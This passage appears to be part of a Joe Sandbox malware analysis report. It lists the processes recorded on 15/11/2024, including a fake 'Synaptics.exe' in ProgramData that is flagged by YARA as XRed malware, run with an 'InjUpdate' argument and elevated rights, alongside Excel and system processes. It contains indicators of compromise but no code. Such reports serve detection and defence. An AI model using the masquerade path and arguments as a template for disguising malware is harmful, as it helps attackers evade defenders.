                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                            Imagebase:0x400000
                                                                                                            File size:771'584 bytes
                                                                                                            MD5 hash:921D4ED8B1BD7EFFC64D14DF5204C817
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:05:23:32
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                            Imagebase:0x650000
                                                                                                            File size:53'161'064 bytes
                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:13
                                                                                                            Start time:05:23:46
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 2896
                                                                                                            Imagebase:0x340000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:15
                                                                                                            Start time:05:23:57
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                            Imagebase:0x7ff662e10000
                                                                                                            File size:71'680 bytes
                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:05:24:34
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:771'584 bytes
                                                                                                            MD5 hash:921D4ED8B1BD7EFFC64D14DF5204C817
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:21
                                                                                                            Start time:05:24:34
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                            Imagebase:0x650000
                                                                                                            File size:53'161'064 bytes
                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:25
                                                                                                            Start time:05:24:56
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 6328
                                                                                                            Imagebase:0x340000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:05:25:32
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Windows\splwow64.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                                                            Imagebase:0x7ff712f20000
                                                                                                            File size:163'840 bytes
                                                                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            No disassembly